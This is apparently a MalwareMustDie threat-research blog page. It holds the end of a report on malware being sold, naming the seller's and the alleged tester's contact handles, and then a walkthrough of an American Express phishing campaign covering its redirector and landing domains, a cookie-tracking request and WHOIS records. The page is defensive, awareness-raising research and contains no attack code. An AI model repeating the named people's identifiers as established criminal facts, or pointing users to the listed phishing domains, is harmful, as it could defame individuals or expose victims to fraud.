- Support of Unicode dumps in processes
- Much more stable
- Improved panel (issues with archivation of dumps and bots), 
  also changed exporting
- Once it founds processes with valid data, the virus scrap just them 
  in a loop of 100 times, then rescan all the processes till it finds
   productive ones. (Done in one thread for stability) 

The Price:

1 bin = 1,5K BTC

The seller / tester contact information

As per se:

Seller jabber: mindark@jabbim.com
Tester jabber: Rome0@Darkode.com 
this Rome0 guy is a well know carder and scammer, with the below contacts (Kudos MMD DE team!)
ICQ 22222193 
Jabber 22222193(at)jabber.cz


The above information is enough to lead the law enforcement to perform the action to get the real actors ID behind the screen. It is reachable, and all we pass it to the justice.
Herewith we are backing off on the investigation and intelligence of this case for the law to follow properly.

MalwareMustDie, NPO., is not owning any source code / samples / reversing data for this threat, we are posting this to support other entities mentioned above for this investigation exclusively, so please ask the mentioned front liner posters for the the further details.

Credit: Kudos MalwareMustDie Intel Dept, InterCrawler (link), Xylibox (link) & Josh Grunzweig (link).

Q & A:

#MalwareMustDie!, we repeat "MUST!!" die. We're on it.
This post is dedicated to MMD Georgia Crusaders.

Wednesday, February 5, 2014

MMD-0015-2014 - One upon the time with American Express Phishing Session..

As you may know, MMD blog is focusing on malware/botnet related threat. But today I want to make an exception, my SMTP Honeypot is full with the American Express phishing scam emails so I dare my self to write my "experience" about this phishing matter. Is not a thorough analysis, so please bear with some lack of information in the post.

On the other hand, I captured everything. For the law enforcement and threat researcher's investigation convenience I attached the PCAP & all captured data grabbed from the session, please feel free to use and analyze it deeper. The point of this public post is to raise awareness of this phishing attempt since some people I know got hit by this scam. Here we go:

It was all started from a phishing email:

I phishing, the url is important, see the above trick of redirector URL in the email.
And URLquery is having records on OTHERS URL too, see below check requests:
↑We can say that kaindustries.comcastbiz.net( is utilized by a phishing effort.

If you click any link in the email, you will get forwarded:

And ending up into the fake American Express site below:

So this perfectbackstretch. com/americanexpress/ in is the landing URL.

The route of the above redirections were generated as per below:

PoC of the forwarding routes in my Wireshark's capture in the Fiddler like setting :-)

For the old-schooler like me, just fire the marked conditions :-)

The scripts that trigger the redirection to the destination is in the URL written in the spam:

Which will call the destination coded in each javascript code in each JS file as per one sample below:

Additionally, I downloaded all HTML codes and run it locally to find a perfect match.. the whole code is meant to run in any remote side without much dependencies to its host/server..

Some suspicious points..

There are plenty of suspicious pouts, some javascripts to check and those are well made to conduct this phishing, again, please see the PCAP for more details on those. This phishing scheme is also using the GoDaddy's SSL service for the encryption, I am not so sure whether the real American Express site is using it too. BUT I want to point you to the correlation of remote sites access that has been spotted and recorded during following the phishing link. and I found it has two suspicious connections and each of those is really "interesting".

To be noted. I am not pointing finger to anyone, it might be there are also traps implemented by the phisher to disrupt the investigation, or maybe the AMEX itself is having these links/codes as default, I don't know 100% about that. So I will let the AmEx phishing experts to judge further, just read two points the explanation below and judge it by yourself, any opinions are welcome in the comment.

1. Cookie link (or callback?) ref to redirector kaindustries.comcastbiz.net on landing page..

.Well, we saw the page I snipped above, but behind the process there was an interesting call below:

Yes, ok, it looks like checking a favicon and received 404, well nothing special.. but after some session on the phishing site executed further, the recorded PCAP below was requesting a similar but quite interesting packet:

It has the cookie request. isn't it?..and it is coded w/URL encode, so..

I fond of cookie codes like this (recently, thx to CookieBomb crooks), and made it "beautiful" and..
There!.. A cookie to keep connection after login..

It explained the redirector sites and the access "ticket" to the phishing landing page..hmm..interesting.

So what's kaindustries.comcastbiz.net?

kaindustries.comcastbiz.net. 13597 IN   A

NetRange: -
NetName:        AFFINITY-INT
NetHandle:      NET-216-87-160-0-1
Parent:         NET-216-0-0-0-0
NetType:        Direct Allocation
RegDate:        1999-07-21
Updated:        2012-03-02
Ref:            http://whois.arin.net/rest/net/NET-216-87-160-0-1

OrgName:        Affinity Internet, Inc
OrgId:          AFFI
Address:        Corporate headquarters
Address:        3250 W. Commercial Blvd.
City:           Ft. Lauderdale
StateProv:      FL
PostalCode:     33309
Country:        US
Updated:        2011-07-07
Ref:            http://whois.arin.net/rest/org/AFFI

OrgAbuseHandle: ABUSE649-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-954-334-8080
The web site:

Doesn't look strange so far..but why the phishing page URL is linked to this site?
Answer: A compromised site.
So what's with the "cookie" request with noticing source of infection? Well, this might be the phishing crook's way to know which malvertisement site/spam ticket that hits this site isn't it? The bad guys are quite persistent in tracking of which spam/redirector URL the request is coming.

Ah, yes. We reported this incident to the site's contact information:

2. An "abuse" request (to fake AmEx ticket?) to nexus.ensighten.com

There is also an interesting GET command to nexus.ensighten.com:

If we beautify the GET URL format will look as per below:

What was causing that GET request is the Bootstrap script below:

A better view of the weird part is:

So let's see if there any response from nexus.ensighten.com about this request:

Is it a coincidence to link to nexus.ensighten.com and grabbing the phishing site's URL and send it?
Is the real American Express site also link to it? I leave the answer to American Express Online folks..
If YES, then this is a merely abuse of the AmEx used API (assumed that nexus.ensighten.com is a legit API of AMEX, to fakes the appearance of the phishing page to look "more legitto fool the victims.

But if the answer is NO..this could be a potential phishing tracking scheme to know the traffic of the hits, we can imagine a scheme of money share is starting at this point between criminals involved, or maybe a panel in that site too?

for some checks. I requested the above JS get URL with the RuleID = 124663 and receiving the below code:

And the second request of RuleID = 302786 to receive below response:

Either these responses are coming from a legit AmEx Online's API that the phishing crooks abused or.. is a good fakes..

Anyway, the nexus.ensighten.com is in AWS:

IS it normal?

And this is the page of nexus.ensighten.com:

Is it normal?

It is out of my expertise. I will pass & leave it to the American Express security team, phishing researcher folks and law enforcement agencies in United States to dig further..


Up to this This point I think I will leave the further investigation to the AMEX phishing experts.
I share the my record data to be used for further investigation as per snipped picture below (click the picture to download)

Please leave the comment with your contact information (email) for the password, I will not publish your comment that asking the passwords.

The URLquery for this phishing is--->>[HERE]
It was taken in the same time as I checked, but URLQuery looks can not access the same result as mine, in my PC with JP IP I can access it.

Kudos our friend who noticing the same threat too :-)

Stay safe friends! #MalwareMustDie